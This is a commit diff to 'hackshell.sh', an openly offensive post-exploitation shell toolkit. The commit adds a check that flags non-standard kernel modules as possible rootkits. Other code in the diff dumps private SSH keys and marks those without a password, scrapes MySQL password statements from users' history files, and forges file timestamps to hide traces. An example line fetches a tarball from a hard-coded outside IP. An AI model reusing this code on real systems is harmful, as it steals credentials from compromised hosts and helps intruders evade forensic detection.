detect root kits

hackerschoice · Nov 25, 2024 · 631959c · 631959c
1 parent 6578979
commit 631959c
Showing 1 changed file with 37 additions and 7 deletions.
diff --git a/hackshell.sh b/hackshell.sh
@@ -219,10 +219,11 @@ burl() {
 # burl http://ipinfo.io
 # PORT=31337 burl http://37.120.235.188/blah.tar.gz >blah.tar.gz
 
-# Execute a command without changing file's ctime/mtime/atime
+# Execute a command without changing file's ctime/mtime/atime/btime
 # notime <reference file> <cmd> ...
 # - notime . rm -f foo.dat
 # - notime foo chmod 700 foo
+# FIXME: Could use debugfs (https://righteousit.com/2024/09/04/more-on-ext4-timestamps-and-timestomping/)
 notime() {
     local ref="$1"
     local now
@@ -733,11 +734,13 @@ loot_sshkey() {
     [ ! -s "${fn}" ] && return
     grep -Fqam1 'PRIVATE KEY' "${fn}" || return
 
-    [ -n "$_HS_SETSID_WAIT" ] && {
-        str="${CF}password protected"
-        setsid -w ssh-keygen -y -f "${fn}" </dev/null &>/dev/null && str="${CDR}NO PASSWORD"
-    }
-    echo -e "${CB}SSH-Key ${CDY}${fn}${CN} ${str}${CDY}${CF}"
+    if [ -n "$_HS_SETSID_WAIT" ]; then
+        str=" ${CF}password protected"
+        setsid -w ssh-keygen -y -f "${fn}" </dev/null &>/dev/null && str=" ${CDR}NO PASSWORD"
+    else 
+        grep -Fqam1 'ENCRYPTED' "${fn}" && str=" ${CF}password protected"
+    fi
+    echo -e "${CB}SSH-Key ${CDY}${fn}${CN}${str}${CDY}${CF}"
     cat "$fn"
     echo -en "${CN}"
 }
@@ -1026,6 +1029,32 @@ _warn_edr() {
     unset -f _hs_chk_systemd _hs_chk_fn
 }
 
+# Warn if there are other root kits found.
+_warn_rk() {
+    local n=0
+    local tainted
+    local str
+
+    [ -e "/proc/sys/kernel/tainted" ] && n="$(</proc/sys/kernel/tainted)"
+    # https://docs.kernel.org/admin-guide/tainted-kernels.html#decoding-tainted-state-at-runtime
+    # Check for Proprietary(0), out-of-tree(12) and unsigned(13)
+    [ "$n" -gt 0 ] && { [ $((n & 1)) -eq 1 ] || [ $((n>>12 & 1)) -eq 1 ] || [ $((n>>13 & 1)) -eq 1 ]; } && tainted=1
+
+    [ -n "$tainted" ] && {
+        echo -e "${CR}Non standard LKM detected${CF} (/proc/sys/kernel/tainted=$n)"
+        while read -r m; do
+            m="${m%% *}"
+            str="$(modinfo "$m")"
+            { [[ "$str" != *"Build time autogenerated kernel"* ]] || [[ "$str" != *"intree:         Y"* ]]; } && {
+                # echo "$m"
+                modinfo "$m" | grep --color=never -E '(^filename|^author)'
+                continue
+            }
+        done </proc/modules
+        echo -en "${CN}"
+    }
+}
+
 _hs_gen_home() {
     local IFS
     local str
@@ -1103,6 +1132,7 @@ lootlight() {
     }
 
     _warn_edr
+    _warn_rk
 }
 
 lootmore() {
@@ -1213,7 +1243,7 @@ loot() {
     for hn in "${HOMEDIRARR[@]}"; do
         fn="${hn}/.mysql_history"
         [ ! -s "$fn" ] && continue
-        str=$(grep -ia '^SET PASSWORD FOR' "$fn") || continue
+        str=$(grep -ia '^SET PASSWORD FOR' "$fn" 2>/dev/null) || continue
         echo -e "${CB}MySQL ${CDY}${fn}${CF}"
         echo "$str"
         echo -en "${CN}"